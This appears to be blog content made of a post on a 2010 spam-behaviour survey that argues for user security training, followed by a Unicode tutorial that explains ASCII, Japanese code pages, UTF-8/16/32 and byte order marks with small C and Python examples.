; Log event 102 ("Task Information: %1") as an Information event (type 4) to the "MyApp" source
LOGEVENT(4, 102, "Database Backup", "", "MyApp")

Curiosity Kills the Cat

25 years ago, on July 24th 1985, the Amiga 1000 was introduced in New York City (check out the ad). Coincidentally, the Amiga 500 was my first computer and I loved playing games on the Rock Lobster – despite the 7.15909 MHz processor. Well, those were the good old days, the days before mainstream email, the days before spam. Or were they? Believe it or not, in 1985 it had already been 7 years since the first spam email was sent by Gary Thuerk over the ARPAnet.

[Photo: amiga_1000.jpg]

I don’t know about you, but 32 years later I still get spam delivered to my inbox on a daily basis, and that’s despite having 2-3 spam filters in place. What’s more, I still get legitimate email caught by the spam filter, mostly to the dismay of the sender.

Now, of course WE all know not to open spam – or to even look at it – as it will potentially confirm receipt (if you display images from non-trusted sources) and could also trigger malware (again depending on your email reader’s configuration).

But, we’ve all seen spam emails and I can’t help but wonder who actually reads these emails (for purposes other than to get a chuckle), much less opens them! Let’s not even think about who opens attachments or clicks links (yikes!) from spam emails.

[Image: spam_adjusted.jpg]

The Facts

So WHO are those people opening and clicking spam? Well, it turns out that the MAAWG, the Messaging Anti-Abuse Working Group, determines exactly that (and presumably other things too) – every year. Better yet, they publish that information for our enjoyment.

It’s been a few months since the latest findings were published, but I’d consider them relevant today nevertheless (and a year from now for that matter).

In a nutshell, the group surveyed the behavior of consumers both in North America and Europe, and published key findings in regards to awareness, consumer confidence and so forth.

Before I give the link to the full PDF (see the Resources section below), here are what I think are some of the most interesting facts:

  • Half of all users in North America and Europe have “confessed” to opening or accessing spam. 46% of those who opened spam, did so intentionally to unsubscribe or out of some untameable sense of curiosity. Some were even interested in the products “advertised” to them!

    Bottom Line: 1 out of 4 people open spam emails because they want to know more, or want to unsubscribe.

  • In more detail, 19% of all users surveyed either clicked on a link from an email (11%) or opened an attachment from an email (8%) that they themselves suspected to be spam. I found that to be one of the most revealing numbers in the report.
  • Young users (under 35) consider themselves more experienced, yet at the same time engage in more risky behavior than other age groups. In Germany, 33% of all users consider themselves to be experts. Compare that to France, where only 8% of all users think they are pros.
  • Less than half of all users think that stopping spam or viruses is their responsibility – instead, they feel the responsibility lies mainly with the ISP and A/V companies. Still, 48% of all respondents do realize that it is their responsibility. The report doesn’t state whether this particular question, which lists 10 choices, was a multiple choice question.
  • When asked about bots, 84% of users were familiar with the possibility that software, say a virus, can control their computer. At the same time, only 47% were familiar with the terms “bot” or “botnet”.
  • On the upside, 94% of all users are running A/V software that is up-to-date, which is a comforting fact. I can only imagine that, given Apple’s market share, Mac users account for most of the remaining 6%.

    My opinion: OS X users are probably still oblivious and don’t see the need to install A/V or any other type of security software on their computers. Still, some PC users apparently don’t install AntiVirus/AntiMalware on their computers either, despite many free options being available today.

Wow, that’s a lot of bad news to digest. So if I may summarize: the reason why we keep getting spam in our inboxes is that every 5th person with a computer clicks on links or opens attachments (ah!) from spam emails, and 6% of all users with a computer don’t run security software. Given the number of people that dwell in the western hemisphere, that amounts to a lot of people.

Well, at least I know now why I keep getting those nuisance emails in my inbox. But somehow I don’t feel any better about them.

Training Day

I think what this report shows us is the importance of user education. While people are apparently aware of spam, it doesn’t look like the average Joe is aware of the implications that a simple click in an email can have.

If you are reading this post, then you are probably a network professional working in an organization. With that comes a unique opportunity to organize a simple workshop with your users, to educate them about the potential threats and remind them that it’s not a good idea to do anything with suspect emails.

[Image: botnet.png]

There is a wealth of information available on the web about educating users on spam and general computer security. We all know that software can only do so much – it’s a constant cat & mouse game between the researchers and the bad guys. It’s simply not possible, at least not today, to make the computers we use on a daily basis 100% secure.

While securing computers in a corporation is possible to some extent using whitelisting, content filters and such, doing the same thing for home computers is much more difficult. And it’s those computers that are most likely to be part of a botnet.

I can only imagine that the average user does not know that botnets can span thousands, if not millions, of computers. The Conficker botnet alone infected around 10 million computers and has the capacity to send 10 billion emails per day.

Let’s face it, the situation will not improve as long as people will click links in emails and open attachments from suspicious senders.

I encourage you to organize a training session with your users on a regular basis. If your organization is large, then you might want to start with the key employees first, and maybe create a tiered training structure.

Our Network is Safe

You might think that your network is safe. You have AntiVirus, white listing, AntiMalware, firewalls in every corner, web content filters and more. Scheduling a training session to tell your users not to do the obvious is probably the last thing on your mind.

But read on.

Risky behavior by your end users will not only affect global spam rates, but your organization as well. Corporate espionage is growing, and spies (whether they are from a foreign government or a corporation) often use email to initially get access to an individual’s computer. See SANS Corporate Espionage 201 (PDF) for some of the techniques being employed.

For example, pretty much every organization has people working from home. If a malicious attacker can compromise a home computer that is used to access a corporate network (even if it’s just used to access emails) and install a key logger, then they will most likely have gotten access to your corporate network. Once they have their foot in the door, it’s only a matter of time.

There are plenty of resources available on the net on how to educate users on security, spam and so forth. A short training session of 20 minutes is probably enough. The message to convey is simple, and if you keep a few points in mind the session can even be fun. Consider the following for the training session:

  • Be sure to interact with your users. Start off by asking them whether they use A/V or AntiMalware software at home.
  • Tell them about botnets, and ask whether they would be happy knowing that their computer is part of a 10-million-node botnet controlled by people in the Ukraine.
  • Be sure to explain that a single user’s actions can compromise the entire corporate network.
  • Explain that technology cannot provide 100% security against intruders.

Of course, user education alone is not the answer to solving security problems like viruses, phishing and the like. Encryption, digital signatures (especially for corporate emails), white-listing all should be employed regardless of user education.

Resources

2010 MAAWG Consumer Survey Key Findings Report (6 pages)
2010 MAAWG Consumer Survey Full Report (87 pages)

Using Cartoons to Teach Internet Security
Get IT Done: IT pros offer tips for teaching users

UNICODE – ONE code to rule them all

If you live in an English-speaking country like the United States, United Kingdom or Australia, then you are in the lucky position where every character in your language can be represented by the ASCII table. Many other languages aren’t as lucky, unfortunately – no surprise, given that over 1000 written languages exist. Most of these languages cannot be represented with ASCII, most notably Asian and Arabic languages.

Take the text below for example, ASCII would be struggling with this a bit (to say the least):

النمسا

Understanding UNICODE is no easy feat however – just the mere abbreviations out there can be mind-boggling: UTF-7, 8, 16, 32, UCS-2, BOM, BMP, code points, Big-Endian, Little-Endian and so forth. UNICODE support is particularly interesting when dealing with different platforms, such as Windows, Unix and OS X.

It’s not all that bad though, and once the dust settles it can all make sense. No, really. As such, the purpose of this article is to give you a basic understanding of UNICODE, enough so that the mention of the word UNICODE doesn’t give you cold shivers down your back.

Unicode is essentially one large character set that includes all characters of written languages, including special characters like symbols and so forth. The goal – and this goal is reality today – is to have one character set for all languages.

Back in 1963, when the first draft of ASCII was published, Internationalization was probably not on the top of the committee member’s minds. Understandable, considering that not too many people were using computers back then. Things have changed since then, as computers are turning up in pretty much every electrical device (maybe with the exception of stoves and blenders).

The easiest way to start is, of course, with ASCII (American Standard Code for Information Interchange). Gosh, were things simple back in the 60s. If you wanted to represent a character digitally, you would simply map it to a number between 0 and 127. Voila, all set. Time to drive home in your Chevrolet, and listen to a Bob Dylan, Beach Boys or Beatles record. I won’t go into the details now, but for the sake of completeness I will include the ASCII representation of the name “Bob Dylan”:


String:      B        o        b                 D        y        l        a        n
Decimal:     66       111      98       32       68       121      108      97       110
Hexadecimal: 0x42     0x6F     0x62     0x20     0x44     0x79     0x6C     0x61     0x6E
Binary:      01000010 01101111 01100010 00100000
             01000100 01111001 01101100 01100001 01101110

Computers, plain and simple as they are, store everything as numbers of course, and as such we need a way to map numbers to letters, and vice versa. This is of course the purpose of the ASCII table, which tells our computers to display a “B” instead of 66.

Since the 7-bit ASCII table has a maximum of 128 characters (0 through 127), any ASCII character can be represented using 7 bits (though they usually consume 8 bits now). This makes calculating, for example, how long a string is quite easy. In C programs, ASCII characters are represented using chars, which use 1 byte (= 8 bits) of storage. Here is an example in C:


#include <string.h>    // for strlen()

char author[] = "The Beatles";
int authorLen = strlen(author);        // authorLen = 11
size_t authorSize = sizeof(author);    // authorSize = 12

The only reason the two values differ is that C automatically appends a 0x0 character at the end of a string (to indicate where it terminates), and as such the size will always be one char(acter) longer than the length.

So, this is all fine and well if we only deal with “simple” languages like English. Once we try to represent a more complex language, Japanese for example, things start to get more challenging. The biggest problem is the sheer number of characters – there are simply more than 127 characters in the world’s written languages. ASCII was extended to 8-bit (primarily to accommodate European languages), but this still only scratches the surface when you consider Asian and Arabic languages.

Hence, a big problem with ASCII is that it is essentially a fixed-length, 8-bit encoding, which makes it impossible to represent complex languages. This is where the Unicode standard comes in: it gives each character a unique code point (number), and includes variable-length encodings as well as 2-byte (or more) encodings.

But before we go too deep into Unicode, we’ll just blatantly pretend that Unicode doesn’t exist and think of a different way to store Japanese text. Yes! Let us enter a world where every language uses a different encoding! No matter what they want to make you believe – having countless encodings around is fun and exciting. Well, actually it’s not, but let’s take a look at why.

The ASCII characters end at 127, leaving another 128 values for other languages. Even though I’m not a linguist, I know that there are more than 128 characters in the rest of the world. Additionally, many Asian languages have significantly more than 255 characters, making a multi-byte encoding (since you cannot represent every character with one byte) necessary.

This is where encodings come in (or better, “came” in before Unicode was established), which are basically like stencils. Let’s use Japanese for our code page example. I don’t speak Japanese unfortunately, but let’s take a look at this word, which means “Farewell” in Japanese (you are probably familiar with pronunciation – “sayōnara”):

さようなら

The ASCII table obviously has no representation for these characters, so we would need a new table. As it turns out, there are two main encodings for Japanese: Shift-JIS and EUC-JP. Yes, as if it’s not bad enough to have one encoding per language!

So code pages serve the same purpose as the ASCII table: they map numbers to letters. The problem with code pages – as opposed to Unicode – is that both the author and the reader need to view the text with the same code page. Otherwise, the text will just be garbled. This is what “sayōnara” looks like in the aforementioned encodings:



EUC-JP:    A4 B5 A4 E8 A4 A6 A4 CA A4 E9

Shift_JIS: 82 B3 82 E6 82 A4 82 C8 82 E7

Their numerical representation between EUC-JP and Shift_JIS is, as is to be expected, completely different – so knowing the encoding is vital. If the encodings don’t match, then the text will be meaningless. And meaningless text is useless.

You can imagine that things can get out of hand when one party (party can be an Operating System, Email client, etc.) uses EUC-JP, and the other Shift_JIS for example. They both represent Japanese characters, but in a completely different way.

Encodings can either (to a certain degree) be auto-detected, or specified as some sort of meta information. Below is a HTML page with the same Japanese word, Shift_JIS encoded:


<HTML>
    <TITLE>Shift_JIS Encoded Page</TITLE>

    <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=Shift_JIS">
    <BODY>
            さようなら
    </BODY>
</HTML>

You can paste this into an editor, save it as a .html file, and then view it in your favorite browser. Try changing “Shift_JIS” to “EUC-JP” – fun things await you.

But I am getting carried away, after all this post is about Unicode, not encodings. So, Unicode solves these problems by giving every character from every language a unique code point. No more “Shift_JIS”, no more “EUC-JP” (not even to mention all the other encodings out there), just UNICODE.

Once a document is encoded in Unicode, specifying a code page is no longer necessary – as long as the client (reader) supports the particular Unicode encoding (e.g. UTF-8) the text is encoded with.

The five major Unicode encodings are:

UTF-8
UCS-2
UTF-16 (an extension of UCS-2)
UTF-32
UTF-7

All of these encodings are Unicode, and represent Unicode characters – UTF-8 is just as capable as UTF-16 or UTF-32. The number in the UTF encoding names represents the minimum number of bits that are required to store a single Unicode code point (in UCS-2, the 2 stands for bytes). As such, UTF-32 can potentially require 4x as much storage as UTF-8, depending on the text that is being encoded. I will be ignoring UTF-7 going forward, as its use is not recommended and it’s not widely used anymore.

The biggest difference between UTF-8 and UCS-2/UTF-16/UTF-32 is that UTF-8 is a variable length encoding, opposed to the others being fixed-length encodings. OK, that was a lie. UCS-2, the predecessor of UTF-16, is indeed a fixed length encoding, whereas UTF-16 is a variable length encoding. In most use cases however, UTF-16 uses 2 bytes and is essentially a fixed length encoding. UTF-32 on the other hand, and that is not a lie, is a fixed-length encoding that always uses 4 bytes to store a character.

Let’s look at this table which lists the 4 major encodings and some of their properties:

Encoding   Variable/Fixed   Min Bytes   Max Bytes
UTF-8      variable         1           4
UCS-2      fixed            2           2
UTF-16     variable         2           4
UTF-32     fixed            4           4



What this means is that in order to represent a Unicode character (e.g. さ), a variable-length encoding might require more than 1 byte – in UTF-8’s case up to 4 bytes. UTF-8 potentially needs more bytes because it maintains backward-compatibility with ASCII: the byte values below 128 are reserved for ASCII characters, leaving fewer usable bits per byte in multi-byte sequences.

Windows uses UTF-16 to store strings internally, as do most Unicode frameworks such as ICU and Qt’s QString. Most Unixes on the other hand use UTF-8, and it’s also the most commonly found encoding on the web. Mac OS X is a bit of a different beast; since it uses a BSD kernel, all BSD system functions use UTF-8, whereas Apple’s Cocoa framework uses UTF-16.

UCS-2 or UTF-16
I had already mentioned that UTF-16 is an extension of UCS-2, so how does it extend it and why does it extend it?

You see, Unicode is so comprehensive now that it encompasses more than what you can store in 2 bytes. All characters (code points) from 0x0000 to 0xFFFF are in the “BMP”, the “Basic Multilingual Plane”. This is the plane that contains most of the character assignments, but additional planes exist; here is a list of all the planes:

•    The “BMP”, “Basic Multilingual Plane”, 0x0000 -> 0xFFFF
•    The “SMP”, “Supplementary Multilingual Plane”, 0x10000 -> 0x1FFFF
•    The “SIP”, “Supplementary Ideographic Plane”, 0x20000 -> 0x2FFFF
•    The “SSP”, “Supplementary Special-purpose Plane”, 0xE0000 -> 0xEFFFF

So technically, having 2 bytes available is not even enough anymore to cover all the available code points – you can only cover the BMP. And this is the main difference between UCS-2 and UTF-16: UCS-2 only supports code points in the BMP, whereas UTF-16 also supports code points in the supplementary planes, through something called “surrogate pairs”.
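A quick way to see a surrogate pair in action is a few lines of Python, which lets us inspect the raw encoded bytes (the character below is from the Supplementary Ideographic Plane, so it cannot fit into a single 16-bit unit):

# U+20000, a CJK ideograph from the SIP
ch = "\U00020000"
print(ch.encode("utf-16-be").hex(" "))    # d8 40 dc 00 - a surrogate pair

# A BMP character like さ (U+3055) still fits into a single 16-bit unit
print("さ".encode("utf-16-be").hex(" "))  # 30 55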

Representation in Unicode
So let’s look at the above sample text in Unicode, shall we? Sayonara Shift_JIS & EUC-JP! The site http://rishida.net/tools/conversion/ has some great online tools for Unicode, one of which is called “Uniview“. It shows us the actual Unicode code points, the symbol itself and the official description:

[Screenshot: UniView showing the code points, symbols and official descriptions for さようなら]

The official Unicode notation uses the U+hex syntax, so for the above letters we would write:


U+3055 U+3088 U+3046 U+306A U+3089

With this information, we can now apply one of the UTF encodings to see the difference:


UTF-8

E3 81 95 E3 82 88 E3 81 86 E3 81 AA E3 82 89

UTF-16
30 55 30 88 30 46 30 6A 30 89

UTF-32
00 00 30 55 00 00 30 88 00 00 30 46 00 00 30 6A 00 00 30 89

So UTF-8 uses 5 more bytes than UCS-2/UTF-16 to represent the same exact characters. Remember that UCS-2 and UTF-16 are identical for this text, since all characters are in the BMP. UTF-32 uses yet another 5 bytes more than UTF-8, and would require the most storage space, as is to be expected.

What you can also see here, is that UTF-16 essentially mirrors the U+ notation.
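You can verify these byte counts yourself with a few lines of Python (the big-endian codec variants are used here because the generic "utf-16"/"utf-32" codecs would prepend a BOM, which we’ll get to shortly):

text = "さようなら"

for encoding in ("utf-8", "utf-16-be", "utf-32-be"):
    data = text.encode(encoding)
    print(f"{encoding:10} {len(data):2} bytes: {data.hex(' ')}")

# utf-8      15 bytes: e3 81 95 e3 82 88 e3 81 86 e3 81 aa e3 82 89
# utf-16-be  10 bytes: 30 55 30 88 30 46 30 6a 30 89
# utf-32-be  20 bytes: 00 00 30 55 00 00 30 88 00 00 30 46 00 00 30 6a 00 00 30 89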

Fixed Length or Variable Length?
Both encoding types have their advantages and disadvantages, and I will be comparing the most popular UTF encodings, UTF-8 and UCS-2, here:

Variable Length UTF-8:
•    ASCII-compatible
•    Uses potentially less space, especially when storing ASCII
•    String analysis/manipulation (e.g. length calculation) is more CPU-intensive

Fixed Length UCS-2:
•    Potentially wastes space, since it always uses fixed amount of storage
•    String analysis/manipulation is usually less CPU intensive

Which encoding to use will depend on the application. If you are creating a web site, then you should probably choose UTF-8. If you are storing data in a database however, then it will depend on the type of strings that will be stored. For example, if you are only storing languages that cannot be represented through ASCII, then it is probably better to use UCS-2. If you are storing both ASCII and languages that require Unicode, then UTF-8 is probably a better choice. An extreme example would be storing English-Only text in a UCS-2 database – it would essentially use twice as much storage as an ASCII version, without any tangible benefits.

One of the strongest suits of UTF-8, at least in my opinion, is its backward compatibility with ASCII. UTF-8 encodes the characters below 128 (0x7F) exactly like ASCII does, and its multi-byte sequences never use byte values in that range. This means that all ASCII text is automatically valid UTF-8, since any UTF-8 parser will recognize those bytes as ASCII characters and render them appropriately.
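This is easy to demonstrate: a plain ASCII byte sequence decodes as UTF-8 without any conversion, while the same text doubles in size when stored as UTF-16/UCS-2:

# Any ASCII byte stream is already valid UTF-8
print(b"Bob Dylan".decode("utf-8"))          # Bob Dylan

print(len("Bob Dylan".encode("utf-8")))      # 9 bytes
print(len("Bob Dylan".encode("utf-16-le")))  # 18 bytes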

The BOM
And this brings us to the next topic – the BOM (header). BOM stands for “Byte Order Mark”, and is usually a 2-4 byte long header at the beginning of a Unicode text stream, e.g. a text file. If a text editor does not recognize a BOM header, then it will usually display the BOM as the characters þÿ or ÿþ.

The purpose of the BOM header is to describe the Unicode encoding, including the endianess, of the document. Note that a BOM is usually not used for UTF-8.

Let’s revisit the example from earlier, the UTF-16 encoding looked like this:


30 55 30 88 30 46 30 6A 30 89

If we wanted to store this text in a file, including a BOM header, then it could also look like this:


FF FE 55 30 88 30 46 30 6A 30 89 30

“FF FE” is the BOM header, and in this case indicates that a UTF-16 Little Endian encoding is used. The same text in UTF-16 Big Endian would look like this:


FE FF 30 55 30 88 30 46 30 6A 30 89

The BOM header is generally only useful when Unicode encoded documents are being exchanged between systems that use different Unicode encodings, but given the extremely little overhead it certainly doesn’t hurt to add it to any UTF-16 encoded document. As such, Windows always adds a 2-byte BOM header to all Unicode text documents. It is the responsibility of the text reader (e.g. an editor) to interpret the BOM header correctly. Linux on the other hand, being a UTF-8 fan and all, does not need to (and does not) use a BOM header – at least not by default.
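Python again makes it easy to see the BOM at work; the codecs module defines the BOM constants, and the generic "utf-16" codec prepends a native-order BOM automatically:

import codecs

text = "さようなら"

# UTF-16 Little Endian with BOM, as Windows would store it
print((codecs.BOM_UTF16_LE + text.encode("utf-16-le")).hex(" "))
# ff fe 55 30 88 30 46 30 6a 30 89 30

# UTF-16 Big Endian with BOM
print((codecs.BOM_UTF16_BE + text.encode("utf-16-be")).hex(" "))
# fe ff 30 55 30 88 30 46 30 6a 30 89

# The generic "utf-16" codec adds a native-order BOM on its own
print(text.encode("utf-16")[:2].hex(" "))    # ff fe on a little-endian machine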

Tools & Resources
There are a variety of resources and tools available to help with Unicode authoring, conversions, and so forth.

I personally like Ultraedit, which lets me convert documents to and from UTF-8 and UTF-16, and also supports the BOM headers. GEdit on Linux is also very capable, and supports different code pages (if you ever need to use those) as well. Babelpad is an editor designed specifically for Unicode, and seems to support every possible encoding. I have not actually used this editor though.

A nifty online converter that I already mentioned earlier can be found at http://rishida.net/tools/conversion/, and also check out UniView: http://rishida.net/scripts/uniview/.

The official Unicode website is of course a great resource too, though potentially overwhelming to mere mortals that only have to deal with Unicode occasionally. The best place to start is probably their basic FAQ: http://www.unicode.org/faq/basic_q.html.

I hope this provides some clarification for those who know that Unicode exists, but are not entirely comfortable with the details.

さようなら!